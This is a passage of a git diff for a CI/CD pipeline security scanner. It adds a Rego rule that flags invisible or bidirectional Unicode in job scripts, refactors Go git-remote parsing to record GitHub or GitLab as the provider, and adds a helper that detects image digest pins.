+ "message": sprintf("job %q contains zero-width or bidirectional Unicode in its scripts / env / action inputs β Trojan Source / invisible-character attack pattern", [job.name]),
+ "job": job.name,
+ }
+}
+
+_job_contains_obfuscation(job) if {
+ some k
+ regex.match(invisible_pattern, job.scripts[k])
+}
+
+_job_contains_obfuscation(job) if {
+ some _, value in job.variables
+ regex.match(invisible_pattern, value)
+}
+
+_job_contains_obfuscation(job) if {
+ some k
+ action := job.uses[k]
+ some _, value in action.with
+ is_string(value)
+ regex.match(invisible_pattern, value)
+}
diff --git a/utils/gitremote.go b/utils/gitremote.go
index 872d3b0..e0fdc10 100644
--- a/utils/gitremote.go
+++ b/utils/gitremote.go
@@ -7,12 +7,26 @@ import (
"strings"
)
-// GitRemoteInfo contains parsed information from a git remote URL
+// GitRemoteInfo contains parsed information from a git remote URL.
type GitRemoteInfo struct {
- Host string // e.g., "gitlab.com" or "gitlab.example.com"
+ Host string // e.g., "gitlab.com", "github.com", "gitlab.example.com"
ProjectPath string // e.g., "group/project" or "group/subgroup/project"
- URL string // The full GitLab URL, e.g., "https://gitlab.com"
+ URL string // The full instance URL, e.g., "https://gitlab.com"
RepoRoot string // Absolute path to the git repository root
+ Provider string // "gitlab" or "github" β derived from Host; default "gitlab" for unknown hosts (self-hosted GitLab is the common case).
+}
+
+// detectProviderFromHost maps a git remote host name to the provider name
+// expected by the rest of Plumber. GitHub is identified exactly;
+// everything else (including self-hosted and gitlab.com) maps to GitLab
+// since that is what Plumber has historically supported.
+func detectProviderFromHost(host string) string {
+ switch strings.ToLower(host) {
+ case "github.com":
+ return "github"
+ default:
+ return "gitlab"
+ }
}
// DetectGitRemote attempts to detect GitLab URL and project path from git remote.
@@ -63,53 +77,38 @@ func DetectGitRepoRoot() string {
// Returns nil if the URL cannot be parsed.
func ParseGitRemoteURL(remoteURL string) *GitRemoteInfo {
// Try SSH URL format: ssh://[user@]host[:port]/path.git
- // The port is intentionally ignored as the GitLab API uses HTTPS
+ // The port is intentionally ignored as the platform API uses HTTPS.
sshURLRegex := regexp.MustCompile(`^ssh://[^@]+@([^/:]+)(?::\d+)?/(.+?)(?:\.git)?$`)
if matches := sshURLRegex.FindStringSubmatch(remoteURL); matches != nil {
- host := matches[1]
- projectPath := matches[2]
- return &GitRemoteInfo{
- Host: host,
- ProjectPath: projectPath,
- URL: fmt.Sprintf("https://%s", host),
- }
+ return newGitRemoteInfo(matches[1], matches[2])
}
// Try SSH SCP-like format: git@host:path.git
sshRegex := regexp.MustCompile(`^git@([^:]+):(.+?)(?:\.git)?$`)
if matches := sshRegex.FindStringSubmatch(remoteURL); matches != nil {
- host := matches[1]
- projectPath := matches[2]
- return &GitRemoteInfo{
- Host: host,
- ProjectPath: projectPath,
- URL: fmt.Sprintf("https://%s", host),
- }
+ return newGitRemoteInfo(matches[1], matches[2])
}
// Try HTTPS format: https://host[:port]/path.git
httpsRegex := regexp.MustCompile(`^https?://([^/]+)/(.+?)(?:\.git)?$`)
if matches := httpsRegex.FindStringSubmatch(remoteURL); matches != nil {
- host := matches[1]
- projectPath := matches[2]
- return &GitRemoteInfo{
- Host: host,
- ProjectPath: projectPath,
- URL: fmt.Sprintf("https://%s", host),
- }
+ return newGitRemoteInfo(matches[1], matches[2])
}
// Try Git protocol format: git://host[:port]/path.git
gitRegex := regexp.MustCompile(`^git://([^/:]+)(?::\d+)?/(.+?)(?:\.git)?$`)
if matches := gitRegex.FindStringSubmatch(remoteURL); matches != nil {
- host := matches[1]
- projectPath := matches[2]
- return &GitRemoteInfo{
- Host: host,
- ProjectPath: projectPath,
- URL: fmt.Sprintf("https://%s", host),
- }
+ return newGitRemoteInfo(matches[1], matches[2])
}
return nil
}
+
+func newGitRemoteInfo(host, projectPath string) *GitRemoteInfo {
+ return &GitRemoteInfo{
+ Host: host,
+ ProjectPath: projectPath,
+ URL: fmt.Sprintf("https://%s", host),
+ Provider: detectProviderFromHost(host),
+ }
+}
diff --git a/utils/pipeline.go b/utils/pipeline.go
index 4630e19..f42acc5 100644
--- a/utils/pipeline.go
+++ b/utils/pipeline.go
@@ -1,6 +1,26 @@
package utils
-import "strings"
+import (
+ "regexp"
+ "strings"
+)
+
+// digestPinRegex matches an OCI image digest pin: `@:`.
+// Algorithm is lowercase alphanumeric (sha256, sha512, ...) per the
+// OCI image spec. Using a regex instead of `strings.Contains(@sha256:)`
+// avoids false negatives on sha512 / future digest algorithms.
+var digestPinRegex = regexp.MustCompile(`@[a-z0-9]+:[a-fA-F0-9]+`)
+
+// HasDigestPin reports whether ref contains a digest reference using
+// any algorithm allowed by the OCI image spec β sha256 today, sha512
+// already in production at some registries, and any future algorithm
+// without a code change. Empty refs return false.
+func HasDigestPin(ref string) bool {
+ if ref == "" {
+ return false
+ }
+ return digestPinRegex.MatchString(ref)
+}
// OverriddenJobDetail captures which job was overridden and with which forbidden CI/CD keywords.
// Shared across control (detection) and pbom (reporting) packages.